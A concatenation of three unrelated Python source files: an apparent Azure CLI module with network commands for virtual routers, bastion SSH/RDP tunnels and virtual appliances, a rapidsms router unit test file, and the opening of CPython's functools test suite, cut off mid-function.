vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
pass
virtual_hub_name = virtual_router_name
try:
vhub_client.get(resource_group_name, virtual_hub_name)
raise CLIError('The VirtualRouter "{}" under resource group "{}" exists'.format(virtual_hub_name,
resource_group_name))
except HttpResponseError:
pass
SubResource = cmd.get_models('SubResource')
# for old VirtualRouter
if hosted_gateway is not None:
VirtualRouter = cmd.get_models('VirtualRouter')
virtual_router = VirtualRouter(virtual_router_asn=None,
virtual_router_ips=[],
hosted_subnet=None,
hosted_gateway=SubResource(id=hosted_gateway),
location=location,
tags=tags)
return vrouter_client.begin_create_or_update(resource_group_name, virtual_router_name, virtual_router)
# for VirtualHub
VirtualHub, HubIpConfiguration = cmd.get_models('VirtualHub', 'HubIpConfiguration')
hub = VirtualHub(tags=tags, location=location, virtual_wan=None, sku='Standard')
ip_config = HubIpConfiguration(subnet=SubResource(id=hosted_subnet))
from azure.cli.core.commands import LongRunningOperation
vhub_poller = vhub_client.begin_create_or_update(resource_group_name, virtual_hub_name, hub)
LongRunningOperation(cmd.cli_ctx)(vhub_poller)
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
try:
vhub_ip_poller = vhub_ip_config_client.begin_create_or_update(resource_group_name,
virtual_hub_name,
'Default',
ip_config)
LongRunningOperation(cmd.cli_ctx)(vhub_ip_poller)
except Exception as ex:
logger.error(ex)
vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, 'Default')
vhub_client.begin_delete(resource_group_name, virtual_hub_name)
raise ex
return vhub_client.get(resource_group_name, virtual_hub_name)
def virtual_router_update_getter(cmd, resource_group_name, virtual_router_name):
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
return vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError: # 404
pass
virtual_hub_name = virtual_router_name
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
return vhub_client.get(resource_group_name, virtual_hub_name)
def virtual_router_update_setter(cmd, resource_group_name, virtual_router_name, parameters):
if parameters.type == 'Microsoft.Network/virtualHubs':
client = network_client_factory(cmd.cli_ctx).virtual_hubs
else:
client = network_client_factory(cmd.cli_ctx).virtual_routers
# If the client is virtual_hubs,
# the virtual_router_name represents virtual_hub_name and
# the parameters represents VirtualHub
return client.begin_create_or_update(resource_group_name, virtual_router_name, parameters)
def update_virtual_router(cmd, instance, tags=None):
# both VirtualHub and VirtualRouter own those properties
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
return instance
def list_virtual_router(cmd, resource_group_name=None):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
if resource_group_name is not None:
vrouters = vrouter_client.list_by_resource_group(resource_group_name)
vhubs = vhub_client.list_by_resource_group(resource_group_name)
else:
vrouters = vrouter_client.list()
vhubs = vhub_client.list()
return list(vrouters) + list(vhubs)
def show_virtual_router(cmd, resource_group_name, virtual_router_name):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
from azure.core.exceptions import HttpResponseError
try:
item = vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
virtual_hub_name = virtual_router_name
item = vhub_client.get(resource_group_name, virtual_hub_name)
return item
def delete_virtual_router(cmd, resource_group_name, virtual_router_name):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
from azure.core.exceptions import HttpResponseError
try:
vrouter_client.get(resource_group_name, virtual_router_name)
item = vrouter_client.begin_delete(resource_group_name, virtual_router_name)
except HttpResponseError:
from azure.cli.core.commands import LongRunningOperation
virtual_hub_name = virtual_router_name
poller = vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, 'Default')
LongRunningOperation(cmd.cli_ctx)(poller)
item = vhub_client.begin_delete(resource_group_name, virtual_hub_name)
return item
def create_virtual_router_peering(cmd, resource_group_name, virtual_router_name, peering_name, peer_asn, peer_ip):
# try VirtualRouter first
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
pass
else:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
VirtualRouterPeering = cmd.get_models('VirtualRouterPeering')
virtual_router_peering = VirtualRouterPeering(peer_asn=peer_asn, peer_ip=peer_ip)
return vrouter_peering_client.begin_create_or_update(resource_group_name,
virtual_router_name,
peering_name,
virtual_router_peering)
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
# try VirtualHub then if the virtual router doesn't exist
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
BgpConnection = cmd.get_models('BgpConnection')
vhub_bgp_conn = BgpConnection(name=peering_name, peer_asn=peer_asn, peer_ip=peer_ip)
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.begin_create_or_update(resource_group_name, virtual_hub_name,
bgp_conn_name, vhub_bgp_conn)
def virtual_router_peering_update_getter(cmd, resource_group_name, virtual_router_name, peering_name):
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
from azure.core.exceptions import HttpResponseError
try:
return vrouter_peering_client.get(resource_group_name, virtual_router_name, peering_name)
except HttpResponseError: # 404
pass
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.get(resource_group_name, virtual_hub_name, bgp_conn_name)
def virtual_router_peering_update_setter(cmd, resource_group_name, virtual_router_name, peering_name, parameters):
if parameters.type == 'Microsoft.Network/virtualHubs/bgpConnections':
client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
else:
client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
# if the client is virtual_hub_bgp_connection,
# the virtual_router_name represents virtual_hub_name and
# the peering_name represents bgp_connection_name and
# the parameters represents BgpConnection
return client.begin_create_or_update(resource_group_name, virtual_router_name, peering_name, parameters)
def update_virtual_router_peering(cmd, instance, peer_asn=None, peer_ip=None):
# both VirtualHub and VirtualRouter own those properties
with cmd.update_context(instance) as c:
c.set_param('peer_asn', peer_asn)
c.set_param('peer_ip', peer_ip)
return instance
def list_virtual_router_peering(cmd, resource_group_name, virtual_router_name):
virtual_hub_name = virtual_router_name
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
try:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
vrouter_peerings = list(vrouter_peering_client.list(resource_group_name, virtual_router_name))
except HttpResponseError:
vrouter_peerings = []
virtual_hub_name = virtual_router_name
try:
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connections
vhub_bgp_connections = list(vhub_bgp_conn_client.list(resource_group_name, virtual_hub_name))
except HttpResponseError:
vhub_bgp_connections = []
return list(vrouter_peerings) + list(vhub_bgp_connections)
def show_virtual_router_peering(cmd, resource_group_name, virtual_router_name, peering_name):
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
pass
else:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
return vrouter_peering_client.get(resource_group_name, virtual_router_name, peering_name)
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
# try VirtualHub then if the virtual router doesn't exist
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.get(resource_group_name, virtual_hub_name, bgp_conn_name)
def delete_virtual_router_peering(cmd, resource_group_name, virtual_router_name, peering_name):
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except: # pylint: disable=bare-except
pass
else:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
return vrouter_peering_client.begin_delete(resource_group_name, virtual_router_name, peering_name)
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
# try VirtualHub then if the virtual router doesn't exist
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.begin_delete(resource_group_name, virtual_hub_name, bgp_conn_name)
# endregion
# region service aliases
def list_service_aliases(cmd, location, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).available_service_aliases
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name=resource_group_name, location=location)
return client.list(location=location)
# endregion
# region bastion
def create_bastion_host(cmd, resource_group_name, bastion_host_name, virtual_network_name,
public_ip_address, location=None, subnet='AzureBastionSubnet'):
client = network_client_factory(cmd.cli_ctx).bastion_hosts
(BastionHost,
BastionHostIPConfiguration,
SubResource) = cmd.get_models('BastionHost',
'BastionHostIPConfiguration',
'SubResource')
ip_config_name = "bastion_ip_config"
ip_configuration = BastionHostIPConfiguration(name=ip_config_name,
subnet=SubResource(id=subnet),
public_ip_address=SubResource(id=public_ip_address))
bastion_host = BastionHost(ip_configurations=[ip_configuration],
location=location)
return client.begin_create_or_update(resource_group_name=resource_group_name,
bastion_host_name=bastion_host_name,
parameters=bastion_host)
def list_bastion_host(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).bastion_hosts
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name=resource_group_name)
return client.list()
SSH_EXTENSION_NAME = 'ssh'
SSH_EXTENSION_MODULE = 'azext_ssh.custom'
SSH_EXTENSION_VERSION = '0.1.3'
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
def _test_extension(extension_name):
from azure.cli.core.extension import (get_extension)
from pkg_resources import parse_version
ext = get_extension(extension_name)
if parse_version(ext.version) < parse_version(SSH_EXTENSION_VERSION):
raise CLIError('SSH Extension (version >= "{}") must be installed'.format(SSH_EXTENSION_VERSION))
def _get_ssh_path(ssh_command="ssh"):
import os
ssh_path = ssh_command
if platform.system() == 'Windows':
arch_data = platform.architecture()
is_32bit = arch_data[0] == '32bit'
sys_path = 'SysNative' if is_32bit else 'System32'
system_root = os.environ['SystemRoot']
system32_path = os.path.join(system_root, sys_path)
ssh_path = os.path.join(system32_path, "openSSH", (ssh_command + ".exe"))
logger.debug("Platform architecture: %s", str(arch_data))
logger.debug("System Root: %s", system_root)
logger.debug("Attempting to run ssh from path %s", ssh_path)
if not os.path.isfile(ssh_path):
raise CLIError("Could not find " + ssh_command + ".exe. Is the OpenSSH client installed?")
else:
raise UnrecognizedArgumentError("Platform is not supported for thie command. Supported platforms: Windows")
return ssh_path
def _get_rdp_path(rdp_command="mstsc"):
import os
rdp_path = rdp_command
if platform.system() == 'Windows':
arch_data = platform.architecture()
sys_path = 'System32'
system_root = os.environ['SystemRoot']
system32_path = os.path.join(system_root, sys_path)
rdp_path = os.path.join(system32_path, (rdp_command + ".exe"))
logger.debug("Platform architecture: %s", str(arch_data))
logger.debug("System Root: %s", system_root)
logger.debug("Attempting to run rdp from path %s", rdp_path)
if not os.path.isfile(rdp_path):
raise CLIError("Could not find " + rdp_command + ".exe. Is the rdp client installed?")
else:
raise UnrecognizedArgumentError("Platform is not supported for thie command. Supported platforms: Windows")
return rdp_path
def _get_host(username, ip):
return username + "@" + ip
def _build_args(cert_file, private_key_file):
private_key = []
certificate = []
if private_key_file:
private_key = ["-i", private_key_file]
if cert_file:
certificate = ["-o", "CertificateFile=" + cert_file]
return private_key + certificate
def ssh_bastion_host(cmd, auth_type, target_resource_id, resource_group_name, bastion_host_name, resource_port=None, username=None, ssh_key=None):
_test_extension(SSH_EXTENSION_NAME)
if not resource_port:
resource_port = 22
if not is_valid_resource_id(target_resource_id):
raise InvalidArgumentValueError("Please enter a valid Virtual Machine resource Id.")
tunnel_server = get_tunnel(cmd, resource_group_name, bastion_host_name, target_resource_id, resource_port)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
if auth_type.lower() == 'password':
if username is None:
raise RequiredArgumentMissingError("Please enter username with --username.")
command = [_get_ssh_path(), _get_host(username, 'localhost')]
elif auth_type.lower() == 'aad':
azssh = _get_azext_module(SSH_EXTENSION_NAME, SSH_EXTENSION_MODULE)
public_key_file, private_key_file = azssh._check_or_create_public_private_files(None, None) # pylint: disable=protected-access
cert_file, username = azssh._get_and_write_certificate(cmd, public_key_file, private_key_file + '-cert.pub') # pylint: disable=protected-access
command = [_get_ssh_path(), _get_host(username, 'localhost')]
command = command + _build_args(cert_file, private_key_file)
elif auth_type.lower() == 'ssh-key':
if username is None or ssh_key is None:
raise RequiredArgumentMissingError("Please enter username --username and ssh cert location --ssh-key.")
command = [_get_ssh_path(), _get_host(username, 'localhost')]
command = command + _build_args(None, ssh_key)
else:
raise UnrecognizedArgumentError("Unknown auth type. Use one of password, aad or akv.")
command = command + ["-p", str(tunnel_server.local_port)]
command = command + ['-o', "StrictHostKeyChecking=no", '-o', "UserKnownHostsFile=/dev/null"]
command = command + ['-o', "LogLevel=Error"]
logger.debug("Running ssh command %s", ' '.join(command))
try:
subprocess.call(command, shell=platform.system() == 'Windows')
except Exception as ex:
raise CLIInternalError(ex)
def rdp_bastion_host(cmd, target_resource_id, resource_group_name, bastion_host_name, resource_port=None):
if not resource_port:
resource_port = 3389
if not is_valid_resource_id(target_resource_id):
raise InvalidArgumentValueError("Please enter a valid Virtual Machine resource Id.")
tunnel_server = get_tunnel(cmd, resource_group_name, bastion_host_name, target_resource_id, resource_port)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
command = [_get_rdp_path(), "/v:localhost:{0}".format(tunnel_server.local_port)]
logger.debug("Running rdp command %s", ' '.join(command))
subprocess.call(command, shell=platform.system() == 'Windows')
tunnel_server.cleanup()
def get_tunnel(cmd, resource_group_name, name, vm_id, resource_port, port=None):
from .tunnel import TunnelServer
client = network_client_factory(cmd.cli_ctx).bastion_hosts
bastion = client.get(resource_group_name, name)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
tunnel_server = TunnelServer(cmd.cli_ctx, 'localhost', port, bastion, vm_id, resource_port)
return tunnel_server
def create_bastion_tunnel(cmd, target_resource_id, resource_group_name, bastion_host_name, resource_port, port, timeout=None):
if not is_valid_resource_id(target_resource_id):
raise InvalidArgumentValueError("Please enter a valid Virtual Machine resource Id.")
tunnel_server = get_tunnel(cmd, resource_group_name, bastion_host_name, target_resource_id, resource_port, port)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.is_alive():
time.sleep(5)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
# endregion
# region security partner provider
def create_security_partner_provider(cmd, resource_group_name, security_partner_provider_name,
security_provider_name, virtual_hub, location=None, tags=None):
client = network_client_factory(cmd.cli_ctx).security_partner_providers
SecurityPartnerProvider, SubResource = cmd.get_models('SecurityPartnerProvider', 'SubResource')
security_partner_provider = SecurityPartnerProvider(security_provider_name=security_provider_name,
virtual_hub=SubResource(id=virtual_hub),
location=location,
tags=tags)
return client.begin_create_or_update(resource_group_name=resource_group_name,
security_partner_provider_name=security_partner_provider_name,
parameters=security_partner_provider)
def update_security_partner_provider(instance, cmd, security_provider_name=None, virtual_hub=None, tags=None):
with cmd.update_context(instance) as c:
c.set_param('security_provider_name', security_provider_name)
c.set_param('virtual_hub', virtual_hub)
c.set_param('tags', tags)
return instance
def list_security_partner_provider(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).security_partner_providers
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name=resource_group_name)
return client.list()
# endregion
# region network gateway connection
def reset_shared_key(cmd, client, virtual_network_gateway_connection_name, key_length, resource_group_name=None):
ConnectionResetSharedKey = cmd.get_models('ConnectionResetSharedKey')
shared_key = ConnectionResetSharedKey(key_length=key_length)
return client.begin_reset_shared_key(resource_group_name=resource_group_name,
virtual_network_gateway_connection_name=virtual_network_gateway_connection_name, # pylint: disable=line-too-long
parameters=shared_key)
def update_shared_key(cmd, instance, value):
with cmd.update_context(instance) as c:
c.set_param('value', value)
return instance
# endregion
# region network virtual appliance
def create_network_virtual_appliance(cmd, client, resource_group_name, network_virtual_appliance_name,
vendor, bundled_scale_unit, market_place_version,
virtual_hub, boot_strap_configuration_blobs=None,
cloud_init_configuration_blobs=None,
cloud_init_configuration=None, asn=None,
location=None, tags=None, no_wait=False):
(NetworkVirtualAppliance,
SubResource,
VirtualApplianceSkuProperties) = cmd.get_models('NetworkVirtualAppliance',
'SubResource',
'VirtualApplianceSkuProperties')
virtual_appliance = NetworkVirtualAppliance(boot_strap_configuration_blobs=boot_strap_configuration_blobs,
cloud_init_configuration_blobs=cloud_init_configuration_blobs,
cloud_init_configuration=cloud_init_configuration,
virtual_appliance_asn=asn,
virtual_hub=SubResource(id=virtual_hub),
nva_sku=VirtualApplianceSkuProperties(
vendor=vendor,
bundled_scale_unit=bundled_scale_unit,
market_place_version=market_place_version
),
location=location,
tags=tags)
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, network_virtual_appliance_name, virtual_appliance)
def update_network_virtual_appliance(instance, cmd, cloud_init_configuration=None, asn=None):
with cmd.update_context(instance) as c:
c.set_param('virtual_appliance_asn', asn)
c.set_param('cloud_init_configuration', cloud_init_configuration)
return instance
def list_network_virtual_appliance(cmd, client, resource_group_name=None):
if resource_group_name:
return client.list_by_resource_group(resource_group_name=resource_group_name)
return client.list()
def create_network_virtual_appliance_site(cmd, client, resource_group_name, network_virtual_appliance_name,
site_name, address_prefix, allow=None, optimize=None, default=None,
no_wait=False):
(BreakOutCategoryPolicies,
Office365PolicyProperties,
VirtualApplianceSite) = cmd.get_models('BreakOutCategoryPolicies',
'Office365PolicyProperties',
'VirtualApplianceSite')
virtual_appliance_site = VirtualApplianceSite(address_prefix=address_prefix,
o365_policy=Office365PolicyProperties(
break_out_categories=BreakOutCategoryPolicies(
allow=allow,
optimize=optimize,
default=default
)))
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, network_virtual_appliance_name, site_name, virtual_appliance_site)
def update_network_virtual_appliance_site(instance, cmd, address_prefix, allow=None, optimize=None, default=None):
with cmd.update_context(instance) as c:
c.set_param('address_prefix', address_prefix)
c.set_param('o365_policy.break_out_categories.allow', allow)
c.set_param('o365_policy.break_out_categories.optimize', optimize)
c.set_param('o365_policy.break_out_categories.default', default)
return instance
# endregion
|
test_router.py
|
#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
import unittest, threading, time, datetime
from rapidsms.router import Router
from rapidsms.connection import Connection
from rapidsms.message import Message
from rapidsms.backends.backend import Backend
from rapidsms.tests.harness import MockApp, MockLogger
class TestRouter(unittest.TestCase):
def test_log(self):
r = Router()
r.logger = MockLogger()
r.log("debug", "test message %d", 5)
self.assertEquals(r.logger[0], (r,"debug","test message %d",5),
"log() calls self.logger.write()")
def test_set_logger(self):
### TODO
pass
def test_build_component (self):
r = Router()
r.logger = MockLogger()
component = r.build_component("rapidsms.tests.%s.MockApp",
{"type":"harness", "title":"test app"})
self.assertEquals(type(component), MockApp, "component has right type")
self.assertEquals(component.title, "test app", "component has right title")
self.assertRaises(Exception, r.build_component,
("rapidsms.tests.%s.MockApp",
{"type":"harness", "title":"test app", "argh": "no config"}),
"build_component gracefully handles bad configuration options")
def test_add_backend (self):
r = Router()
r.logger = MockLogger()
r.add_backend({"type":"backend", "title":"test_backend"})
self.assertEquals(len(r.backends), 1, "backends has 1 item")
self.assertEquals(type(r.backends[0]), Backend, "backend has correct type")
def test_add_app (self):
### TODO
pass
def test_start_backend (self):
### TODO
pass
def test_start_all_apps (self):
### TODO
pass
def test_start_all_backends (self):
### TODO
pass
def test_stop_all_backends (self):
### TODO
pass
def test_start_and_stop (self):
r = Router()
r.logger = MockLogger()
threading.Thread(target=r.start).start()
self.assertTrue(r.running)
r.stop()
self.assertTrue(not r.running)
# not waiting for the router to shutdown causes exceptions
# on global destruction. (race condition)
time.sleep(1.0)
def test_run(self):
r = Router()
r.logger = MockLogger()
app = r.build_component("rapidsms.tests.%s.MockApp",
{"type":"harness", "title":"test app"})
r.apps.append(app)
r.add_backend({"type":"backend", "title":"test_backend"})
backend = r.get_backend("test-backend") # NOTE the dash; FIXME
msg = backend.message("test user", "test message")
r.send(msg)
r.run()
received = app.calls[-1][1]
self.assertEquals(msg, received, "message is identical")
self.assertEquals(msg.connection, received.connection, "same connection")
self.assertEquals(msg.text, received.text, "same text")
def test_call_at (self):
def callback(stash, arg1, **argv):
stash["arg1"]=arg1
if "try_again" in argv and "try_again" not in stash:
stash["try_again"] = False
return 1.0
else:
stash.update(argv)
r = Router()
r.logger = MockLogger()
stash = {}
r.call_at(0.5, callback, stash, 1, arg2="a")
r.call_at(datetime.datetime.now() + datetime.timedelta(seconds=0.5), callback, stash, 1, arg3="b")
r.call_at(datetime.timedelta(seconds=1.0), callback, stash, 1, try_again=True)
r.call_at(3, callback, stash, 2)
threading.Thread(target=r.start).start()
time.sleep(1.0)
self.assertEquals(stash["arg1"], 1, "*args ok")
self.assertEquals(stash["arg2"], "a", "**kargs ok")
self.assertEquals(stash["arg3"], "b", "datetime works")
self.assertEquals(stash["try_again"], False, "timedelta works")
time.sleep(3.0)
self.assertEquals(stash["try_again"], True, "repeated callback")
self.assertEquals(stash["arg1"], 2, "int works")
r.stop()
def test_incoming(self):
pass
def test_outgoing(self):
pass
if __name__ == "__main__":
unittest.main()
|
test_functools.py
|
import abc
import collections
import copy
from itertools import permutations
import pickle
from random import choice
import sys
from test import support
import unittest
from weakref import proxy
try:
import threading
except ImportError:
threading = None
import functools
py_functools = support.import_fresh_module('functools', blocked=['_functools'])
c_functools = support.import_fresh_module('functools', fresh=['_functools'])
decimal = support.import_fresh_module('decimal', fresh=['_decimal'])
def capture(*args, **kw):
"""capture all positional and keyword arguments"""
return args, kw
def signature(part):
""" return the signature of a partial object """
return (part.func, part.args, part.keywords, part.__dict__)
class MyTuple(tuple):
pass
class BadTuple(tuple):
def __add__(self, other):
return list(self) + list(other)
class MyDict(dict):
pass
class TestPartial:
def test_basic_examples(self):
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertTrue(callable(p))
self.assertEqual(p(3, 4, b=30, c=40),
((1, 2, 3, 4), dict(a=10, b=30, c=40)))
p = self.partial(map, lambda x: x*10)
self.assertEqual(list(p([1,2,3,4])), [10, 20, 30, 40])
def test_attributes(self):
p = self.partial(capture, 1, 2, a=10, b=20)
# attributes should be readable
self.assertEqual(p.func, capture)
self.assertEqual(p.args, (1, 2))
self.assertEqual(p.keywords, dict(a=10, b=20))
def test_argument_checking(self):
self.assertRaises(TypeError, self.partial) # need at least a func arg
try:
self.partial(2)()
except TypeError:
pass
else:
self.fail('First arg not checked for callability')
def test_protection_of_callers_dict_argument(self):
# a caller's dictionary should not be altered by partial
def func(a=10, b=20):
return a
d = {'a':3}
p = self.partial(func, a=5)
self.assertEqual(p(**d), 3)
self.assertEqual(d, {'a':3})
p(b=7)
self.assertEqual(d, {'a':3})
def test_arg_combinations(self):
# exercise special code paths for zero args in either partial
# object or the caller
p = self.partial(capture)
self.assertEqual(p(), ((), {}))
self.assertEqual(p(1,2), ((1,2), {}))
p = self.partial(capture, 1, 2)
self.assertEqual(p(), ((1,2), {}))
self.assertEqual(p(3,4), ((1,2,3,4), {}))
def test_kw_combinations(self):
# exercise special code paths for no keyword args in
# either the partial object or the caller
p = self.partial(capture)
self.assertEqual(p.keywords, {})
self.assertEqual(p(), ((), {}))
self.assertEqual(p(a=1), ((), {'a':1}))
p = self.partial(capture, a=1)
self.assertEqual(p.keywords, {'a':1})
self.assertEqual(p(), ((), {'a':1}))
self.assertEqual(p(b=2), ((), {'a':1, 'b':2}))
# keyword args in the call override those in the partial object
self.assertEqual(p(a=3, b=2), ((), {'a':3, 'b':2}))
def test_positional(self):
# make sure positional arguments are captured correctly
for args in [(), (0,), (0,1), (0,1,2), (0,1,2,3)]:
p = self.partial(capture, *args)
expected = args + ('x',)
got, empty = p('x')
self.assertTrue(expected == got and empty == {})
def test_keyword(self):
# make sure keyword arguments are captured correctly
for a in ['a', 0, None, 3.5]:
p = self.partial(capture, a=a)
expected = {'a':a,'x':None}
empty, got = p(x=None)
self.assertTrue(expected == got and empty == ())
def test_no_side_effects(self):
# make sure there are no side effects that affect subsequent calls
p = self.partial(capture, 0, a=1)
args1, kw1 = p(1, b=2)
self.assertTrue(args1 == (0,1) and kw1 == {'a':1,'b':2})
args2, kw2 = p()
self.assertTrue(args2 == (0,) and kw2 == {'a':1})
def test_error_propagation(self):
def f(x, y):
x / y
self.assertRaises(ZeroDivisionError, self.partial(f, 1, 0))
self.assertRaises(ZeroDivisionError, self.partial(f, 1), 0)
self.assertRaises(ZeroDivisionError, self.partial(f), 1, 0)
self.assertRaises(ZeroDivisionError, self.partial(f, y=0), 1)
def test_weakref(self):
f = self.partial(int, base=16)
p = proxy(f)
self.assertEqual(f.func, p.func)
f = None
self.assertRaises(ReferenceError, getattr, p, 'func')
def test_with_bound_and_unbound_methods(self):
data = list(map(str, range(10)))
join = self.partial(str.join, '')
self.assertEqual(join(data), '0123456789')
join = self.partial(''.join)
self.assertEqual(join(data), '0123456789')
def test_nested_optimization(self):
partial = self.partial
inner = partial(signature, 'asdf')
nested = partial(inner, bar=True)
flat = partial(signature, 'asdf', bar=True)
self.assertEqual(signature(nested), signature(flat))
def test_nested_partial_with_attribute(self):
# see issue 25137
partial = self.partial
def foo(bar):
return bar
p = partial(foo, 'first')
p2 = partial(p, 'second')
p2.new_attr = 'spam'
self.assertEqual(p2.new_attr, 'spam')
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialC(TestPartial, unittest.TestCase):
if c_functools:
partial = c_functools.partial
def test_attributes_unwritable(self):
# attributes should not be writable
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertRaises(AttributeError, setattr, p, 'func', map)
self.assertRaises(AttributeError, setattr, p, 'args', (1, 2))
self.assertRaises(AttributeError, setattr, p, 'keywords', dict(a=1, b=2))
p = self.partial(hex)
try:
del p.__dict__
except TypeError:
pass
else:
self.fail('partial object allowed __dict__ to be deleted')
def test_repr(self):
args = (object(), object())
args_repr = ', '.join(repr(a) for a in args)
kwargs = {'a': object(), 'b': object()}
kwargs_reprs = ['a={a!r}, b={b!r}'.format_map(kwargs),
'b={b!r}, a={a!r}'.format_map(kwargs)]
if self.partial is c_functools.partial:
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
self.assertEqual('{}({!r})'.format(name, capture),
repr(f))
f = self.partial(capture, *args)
self.assertEqual('{}({!r}, {})'.format(name, capture, args_repr),
repr(f))
f = self.partial(capture, **kwargs)
self.assertIn(repr(f),
['{}({!r}, {})'.format(name, capture, kwargs_repr)
for kwargs_repr in kwargs_reprs])
f = self.partial(capture, *args, **kwargs)
self.assertIn(repr(f),
['{}({!r}, {}, {})'.format(name, capture, args_repr, kwargs_repr)
for kwargs_repr in kwargs_reprs])
def test_recursive_repr(self):
if self.partial is c_functools.partial:
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
self.assertEqual(repr(f), '%s(%s(...))' % (name, name))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
self.assertEqual(repr(f), '%s(%r, %s(...))' % (name, capture, name))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
self.assertEqual(repr(f), '%s(%r, a=%s(...))' % (name, capture, name))
finally:
f.__setstate__((capture, (), {}, {}))
def test_pickle(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertEqual(signature(f_copy), signature(f))
def test_copy(self):
f = self.partial(signature, ['asdf'], bar=[True])
